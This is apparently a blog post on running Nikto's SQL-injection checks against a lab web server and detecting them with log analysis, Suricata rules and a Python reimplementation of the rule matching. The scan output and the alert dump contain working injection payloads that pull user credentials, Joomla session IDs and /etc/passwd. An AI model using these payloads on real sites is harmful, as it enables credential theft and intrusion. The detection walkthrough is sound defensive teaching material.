This post is part of a series on learning more about Nikto and web application scanning from the perspectives of both the hack and its detection.
From the hacking perspective, Nikto is the tool used. From the detection perspective, the tools and/or processes used for the network forensics are log analysis, TShark, Zeek and Suricata.
The Hack - SQL Injection with default evasion.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]
└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -nossl -no404 -Tuning 9
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.0.0.106
+ Target Hostname: 10.0.0.106
+ Target Port: 80
+ Start Time: 2023-06-09 14:09:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
+ /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Retrieved x-powered-by header: PHP/8.0.28.
+ PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/* - Redirects (302) to http://10.0.0.106/dashboard/ , My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.
....
+ /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) - Redirects (302) to http://10.0.0.106/dashboard/ , Joomla is vulnerable to a SQL injection which can lead to administrator access. https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0
+ 783 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-06-09 14:09:22 (GMT-4) (2 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Once again, index.php does not have most of the parameters that Nikto is reporting as vulnerable. What do I make of the output from the tool? I make that it is time for me to move on.
See here for more guidance on SQL Injection:
Learning by practicing: Beginning Web Application Testing: SQL Injection - Mutillidae (securitynik.com)
or
Learning by practicing: Continuing SQL Injection with SQLMap - Exploitation (securitynik.com)
Detect - Log Analysis
Quick log analysis says most of this activity is a waste of time. First, most of the parameters targeted here do not exist on the index.php page. We know this from the previous posts in this series. Second, there is no request.php file.
I've lost interest. Maybe I need to do the test from another perspective.
See this link for assistance with detecting SQL injection in your infrastructure.
Detect - Suricata (IDS) Analysis
Setup Suricata to operate in IDS mode
┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all
What does the IDS see?
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]
└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5
     35 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt
     14 1:2021390:3] ET WEB_SPECIFIC_APPS WEB-PHP RCE PHPBB 2004-1315
      6 1:2006445:14] ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM
      5 1:2006446:14] ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT
      4 1:2011042:6] ET WEB_SERVER MYSQL SELECT CONCAT SQL Injection Attempt
We see 3 unique alerts for SQL injection attempts. Find the associated rules:
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]
└─$ grep --perl-regexp "2006445|2006446|2011042" /var/lib/suricata/rules/suricata.rules
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM"; flow:established,to_server; http.uri; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:url,en.wikipedia.org/wiki/SQL_injection; reference:url,doc.emergingthreats.net/2006445; classtype:web-application-attack; sid:2006445; rev:14; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_05_01;)
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT"; flow:established,to_server; http.uri; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:url,en.wikipedia.org/wiki/SQL_injection; reference:url,doc.emergingthreats.net/2006446; classtype:web-application-attack; sid:2006446; rev:14; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_01;)
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER MYSQL SELECT CONCAT SQL Injection Attempt"; flow:established,to_server; http.uri; content:"SELECT"; nocase; content:"CONCAT"; nocase; pcre:"/SELECT.+CONCAT/i"; reference:url,ferruh.mavituna.com/sql-injection-cheatsheet-oku/; reference:url,www.webdevelopersnotes.com/tutorials/sql/a_little_more_on_the_mysql_select_statement.php3; reference:url,doc.emergingthreats.net/2011042; classtype:web-application-attack; sid:2011042; rev:6; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_14;)
Find an alert for "2006445"
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]
└─$ less alert-debug.log
ALERT CNT:           2
ALERT MSG [00]:      ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM
ALERT GID [00]:      1
ALERT SID [00]:      2006445
ALERT REV [00]:      14
ALERT CLASS [00]:    Web Application Attack
ALERT PRIO [00]:     1
ALERT FOUND IN [00]: STATE
ALERT IN TX [00]:    34
PAYLOAD LEN:         316
PAYLOAD:
0000  47 45 54 20 2F 73 69 74 65 2F 27 25 32 30 55 4E  GET /sit e/'%20UN
0010  49 4F 4E 25 32 30 41 4C 4C 25 32 30 53 45 4C 45  ION%20AL L%20SELE
0020  43 54 25 32 30 46 69 6C 65 54 6F 43 6C 6F 62 28  CT%20Fil eToClob(
0030  27 2F 65 74 63 2F 70 61 73 73 77 64 27 2C 27 73  '/etc/pa sswd','s
0040  65 72 76 65 72 27 29 3A 3A 68 74 6D 6C 2C 30 25  erver'): :html,0%
0050  32 30 46 52 4F 4D 25 32 30 73 79 73 75 73 65 72  20FROM%2 0sysuser
0060  73 25 32 30 57 48 45 52 45 25 32 30 75 73 65 72  s%20WHER E%20user
0070  6E 61 6D 65 3D 55 53 45 52 25 32 30 2D 2D 2F 2E  name=USE R%20--/.
0080  68 74 6D 6C 20 48 54 54 50 2F 31 2E 31 0D 0A 55  html HTT P/1.1..U
0090  73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C  ser-Agen t: Mozil
00A0  6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20  la/5.0 ( Windows
00B0  4E 54 20 31 30 2E 30 3B 20 57 69 6E 36 34 3B 20  NT 10.0; Win64;
00C0  78 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69 74  x64) App leWebKit
00D0  2F 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C 20  /537.36  (KHTML,
00E0  6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 6F  like Gec ko) Chro
00F0  6D 65 2F 37 34 2E 30 2E 33 37 32 39 2E 31 36 39  me/74.0. 3729.169
0100  20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 0D 0A   Safari/ 537.36..
0110  43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70  Connecti on: Keep
0120  2D 41 6C 69 76 65 0D 0A 48 6F 73 74 3A 20 31 30  -Alive.. Host: 10
0130  2E 30 2E 30 2E 31 30 36 0D 0A 0D 0A              .0.0.106 ....
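As an added example (not code from this post, from Suricata or from the Emerging Threats ruleset), the http.uri matching logic of the three rules grepped above is reduced to Python and run over the request URIs from the Nikto output and the alert-debug.log payload, so you can see which rule fires on which request and why the Joomla payload never trips UNION SELECT. It assumes Suricata's http.uri buffer is the percent-decoded, normalised URI (an assumption about libhtp's normalisation).

```python
import re
from urllib.parse import unquote

# Added example, not Suricata's own matcher: sid -> (ordered content keywords,
# optional pcre). Every content in these rules is "nocase", and each later
# content carries "distance:0" relative to the previous match.
RULES = {
    2006445: (["SELECT", "FROM"], None),                                   # SELECT FROM
    2006446: (["UNION", "SELECT"], None),                                  # UNION SELECT
    2011042: (["SELECT", "CONCAT"], re.compile(r"SELECT.+CONCAT", re.I)),  # SELECT CONCAT
}

def normalize_uri(raw_uri: str) -> str:
    """Assumed http.uri normalisation: percent-decode once, so %20SELECT%20 and
    /**/SELECT/**/ both expose the bare keyword to the content matches."""
    return unquote(raw_uri)

def contents_match(buf: str, contents: list[str]) -> bool:
    """content:A; nocase; content:B; nocase; distance:0; -> B must begin at or
    after the end of the A match. For two contents a greedy first-hit search
    gives the same verdict as Suricata's backtracking search."""
    hay, pos = buf.upper(), 0
    for needle in contents:
        idx = hay.find(needle.upper(), pos)
        if idx < 0:
            return False
        pos = idx + len(needle)
    return True

def matching_sids(raw_uri: str) -> list[int]:
    """Return the SIDs (in rule order) that would fire on this request URI."""
    uri = normalize_uri(raw_uri)
    return [sid for sid, (contents, pcre) in RULES.items()
            if contents_match(uri, contents) and (pcre is None or pcre.search(uri))]

# Request URIs copied from the Nikto output and the alert-debug.log payload in this post.
EGALLERY_URI = ("/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/"
                "0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),"
                "0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*")
JOOMLA_URI = ("/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1"
              "&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))"
              "%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)")
ALERT_URI = ("/site/'%20UNION%20ALL%20SELECT%20FileToClob('/etc/passwd','server')::html,0%20FROM%20sysusers"
             "%20WHERE%20username=USER%20--/.html")

if __name__ == "__main__":
    for name, uri in [("My_eGallery", EGALLERY_URI), ("Joomla", JOOMLA_URI), ("alert-debug payload", ALERT_URI)]:
        print(f"{name}: {matching_sids(uri)}")
```

The third URI is the one in the alert-debug.log entry above; the two SIDs it returns agree with that entry's ALERT CNT: 2.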
That's it. Moving on.
Hope you enjoyed the posts in this series: